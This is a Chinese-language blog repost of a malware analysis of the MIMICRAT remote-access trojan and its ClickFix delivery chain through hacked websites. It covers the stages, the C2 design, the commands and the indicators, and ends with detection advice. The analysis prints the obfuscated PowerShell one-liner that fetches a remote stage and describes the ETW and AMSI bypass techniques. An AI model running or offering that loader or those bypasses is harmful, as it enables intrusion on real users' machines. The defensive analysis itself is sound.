文章总结： 近期发现名为MIMICRAT的定制化远控木马，通过ClickFix攻击活动利用被黑合法网站（如bincheck.io）投递。攻击链包含五阶段：混淆PowerShell命令、绕过ETW/AMSI的PowerShell脚本、Lua加载器、Shellcode，最终内存加载功能完备的C++远控木马。该木马具备22条命令，支持令牌窃权、SOCKS5代理、进程注入等，C2通信伪装成正常HTTPS流量并使用CloudFront域名。建议监控可疑PowerShell执行、DNS查询及内存shellcode行为以防御此类隐蔽攻击。 综合评分： 78 文章分类： 恶意软件,威胁情报,应急响应,渗透测试,终端安全

MIMICRAT：一个利用真实网站投递的“精装修”远控木马

幻泉之洲

2026年2月26日 09:16 北京

近期，一次名为ClickFix的攻击活动利用被入侵的合法网站作为跳板，投放了一个包含五个阶段的复杂攻击链。其终点并非常见的窃密木马，而是一个功能完备的定制化远程访问木马（RAT）——MIMICRAT。这篇文章带你看清它的递送手法、代码技巧和背后团队的“精装修”能力。

不一样的ClickFix

说实话，现在搞个恶意软件，如果只是把用户密码偷走或者弹个勒索提示，都显得有点“糙”了。真正的狠活儿，是悄无声息地拿到你电脑的长期控制权。最近的ClickFix攻击活动就是这么干的。

Elastic安全实验室的研究人员发现了一波新的ClickFix攻击，它没停在投放烂大街的窃密木马那一步，而是层层深入，最终植入了一个自研的、用C++写的远控木马，我们管它叫MIMICRAT。

这个木马有什么特别？它不是那种随便找个开源代码改改的玩意。它有可塑性极强的C2通信配置，能偷Windows令牌进行权限提升，支持SOCKS5代理隧道，还内置了22条命令，涵盖了从文件操作到进程注入的完整攻击链。这种定制程度，说明背后的团队投入了不少精力。

高水平的攻击活动，往往体现在对细节的打磨和对公共资源的“创造性”利用上。

精心打造的投递链

这次攻击最精妙的地方在于，攻击者自己几乎不架设服务器。他们“借用”了两个完全合法的网站。

整个攻击的起点是bincheck[.]io，一个正规的银行卡BIN码查询网站。攻击者黑了这个网站，在网页代码里插了一行恶意脚本。这行脚本会动态加载另一个外部JavaScript文件，而这个文件存放在第二个被黑的网站——一个印度的正规共同基金投资平台上。

被加载的恶意脚本伪装成常用的jQuery库（名字是jq.php），混在正常的网页资源里，极难察觉。

正是这个远程加载的脚本，呈现了经典的ClickFix诱饵：一个伪造的Cloudflare验证页面，提示用户“系统遇到问题，需要手动修复”。骗术的核心是，页面会自动将一个恶意PowerShell命令复制到用户的剪贴板，并引导用户按Win+R打开运行框，粘贴执行。整个过程没有文件下载，直接绕过了浏览器基于下载的安全防护。

这种“A站被黑加载B站脚本”的模式，一方面分散了检测风险，另一方面也增加了诱饵的可信度——脚本来自另一个看似正经的网站。为了扩大影响面，这个假页面居然支持17种语言，会根据你的浏览器语言自动切换，诚意十足。从已发现的受害者来看，美国高校用户和中文用户都有中招。

一旦用户执行了那条命令，五幕大戏就正式开场了。

剖析五阶段攻击链

第一阶段：花里胡哨的PowerShell单行命令

剪贴板里的命令长这样，充满了障眼法：

powershell.exe -WInDo Min $RdLU=\’aZmEwGEtHPckKyBXPxMRi.neTwOrkicsGf\’;$OnRa=($RdLU.Substring(17,12));$jOFn=.($RdLU[(87)/(3)]+$RdLU[19]+$RdLU[2]) $OnRa;$TNNt=$jOFn; .($TNNt.Remove(0,3).Remove(3))($TNNt); # connects to xMRi.neTwOrk

它用一个乱七八糟的种子字符串，通过字符切片和算术运算，在运行时动态拼出目标域名和要执行的PowerShell命令。这样一来，静态分析根本看不到明文的C2地址。这条命令最终会联系xmri.network这个域名，下载第二阶段的脚本。

第二阶段：武装到牙齿的PowerShell脚本

下载下来的第二阶段脚本，混淆程度更上一层楼。所有字符串都用算术表达式算出ASCII码来动态构造，防静态分析能力点满。

这个脚本主要干四件事，步步为营：

• 干掉ETW事件追踪

  ：通过反射（Reflection）技术，直接修改Windows系统内部类EventProvider的m\_enabled字段为0，让PowerShell脚本的日志记录功能直接瘫痪。

• 绕过AMSI反恶意软件扫描接口

  ：同样用反射，把AmsiUtils类的amsiInitFailed字段设为$true，骗过系统，让后续的脚本内容不再被扫描。

• 内存补丁高级绕过

  ：这步更狠，直接操作内存，用Marshal.Copy修改AMSI扫描函数在内存中的指针，让它指向一个空函数。这是比较少见的深度防御规避手法。

• 投递下一阶段载荷

  ：在日志和杀软都被“蒙上眼睛”后，脚本解码一个Base64编码的ZIP压缩包，解压到ProgramData目录下，并执行其中的zbuild.exe文件。干完活还把临时文件清理干净。

第三阶段：Lua加载器

上一步执行的zbuild.exe其实是一个定制的Lua 5.4.7解释器。它在运行时通过一个XOR（异或）解密例程，解密并执行一段内嵌的Lua脚本。

这段Lua脚本实现了一个自定义的Base64解码器（用了非标准字母表），来解码一段内嵌的shellcode（一种直接在内存中运行的机器码）。然后它通过Lua的alloc、cpy、exe函数，在内存中开辟一块可执行区域，把shellcode拷进去直接运行。全程无文件落地。

第四阶段：Shellcode与第五阶段：MIMICRAT登场

解密出来的shellcode带有Meterpreter（Metasploit框架的载荷）的特征，它负责将最终的木马反射式地加载到内存中。

最终的主角MIMICRAT是一个原生的64位Windows程序，编译时间戳是2026年1月29日。它不是什么山寨货，通信协议、命令调度都是自己从头写的。

专业木马的自我修养

如果说前面的攻击链是“精装修”的施工队，那MIMICRAT本身就是一套功能齐全的“智能家居系统”。

隐蔽的C2通信

它的C2配置藏在程序的.data数据段里，包含加密密钥、连接参数和两套完整的HTTP通信模板。通信全部走HTTPS 443端口，每10秒回连一次，心跳间隔可在运行时调整。

它用的C2服务器域名是d15mawx0xveem1.cloudfront[.]net，一个CloudFront（AWS的内容分发网络）地址，用RC4加密存储。这种利用云服务商域名做C2的方式，隐蔽性很强。

通信加密用了RSA-1024交换会话密钥，再用AES加密具体流量。有意思的是，它的AES密钥是从一个随机生成的字符串的SHA-256哈希值派生出来的。

它伪造的HTTP请求几乎可以乱真。比如“上线”请求（GET）的URI是/intake/organizations/events?channel=app，用户代理字符串伪装成Edge浏览器，甚至Referer都设置成谷歌搜索链接，语言偏好设成中文。数据回传（POST）的URI则模仿成/discover/pcversion/metrics?clientver=ds这类常见的遥测数据上报路径。

22条全能命令

一个木马好不好用，看它能干什么。MIMICRAT有22条命令，简单说就是：系统能干的事，它基本都能替你干。

| 命令ID | 功能 | 说明 | | — | — | — | | 3 | 退出 | 结束木马进程 | | 4 | 设置心跳间隔 | 配置休眠时间和抖动 | | 12 | 创建进程 | 优先使用窃取的令牌创建进程，提权必备 | | 31 | 窃取令牌 | 复制目标进程的令牌 | | 32 | 列出进程 | 枚举所有进程信息 | | 53 | 列出文件 | 查看目录和文件 | | 78 | 交互式Shell | 开一个持久的CMD管道 | | 100 | 注入Shellcode | 反射式注入代码到其他进程 | | 101 | SOCKS5代理 | 在受害者机器上搭建代理隧道，方便内网渗透 |

从文件操作、进程管理，到令牌窃取、横向移动的SOCKS5代理，功能非常全面。这已经不是小偷小摸了，这是准备在你电脑里安家落户。

基础设施与背后的思考

这次攻击的基础设施分得很清楚：

• A集群

  (45.13.212.250/251)：负责初始投递，域名用了大小写混合混淆（如xMRi.neTwOrk）。

• B集群

  (23.227.202.114)：木马上线后的真正指挥部。

这种攻击最大的威胁在于其“合法性”。恶意代码来自被黑的真实网站，诱导界面精心本地化，通信流量模仿正常软件，使得传统的基于信誉或签名的防御手段很容易失效。

我们能做什么？

面对这种级别的攻击，普通用户和企业不能只依赖“有没有报毒”。Elastic实验室给出了一些检测思路，比如监控被混淆的PowerShell脚本执行、对可疑顶级域名的DNS查询、通过Windows运行框执行可疑命令的行为，以及令牌窃取和内存shellcode执行等底层动作。

他们也在GitHub上公布了相关的YARA检测规则和具体威胁指标（IoC），安全团队可以用来在自己的环境里搜索排查。

这次MIMICRAT攻击活动给我们提了个醒：现在的攻击者更像“低调的工匠”，他们不追求轰动效应，而是耐心地利用现有资源，打磨攻击的每一个环节，追求长期、隐蔽的控制。防御者必须看得更深，不仅看文件，更要看行为；不仅看单点，更要看链条。毕竟，当恶意软件都开始“精装修”的时候，我们的防御体系也得升级换代了。

参考资料

[1] https://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：幻泉之洲 《MIMICRAT：一个利用真实网站投递的“精装修”远控木马》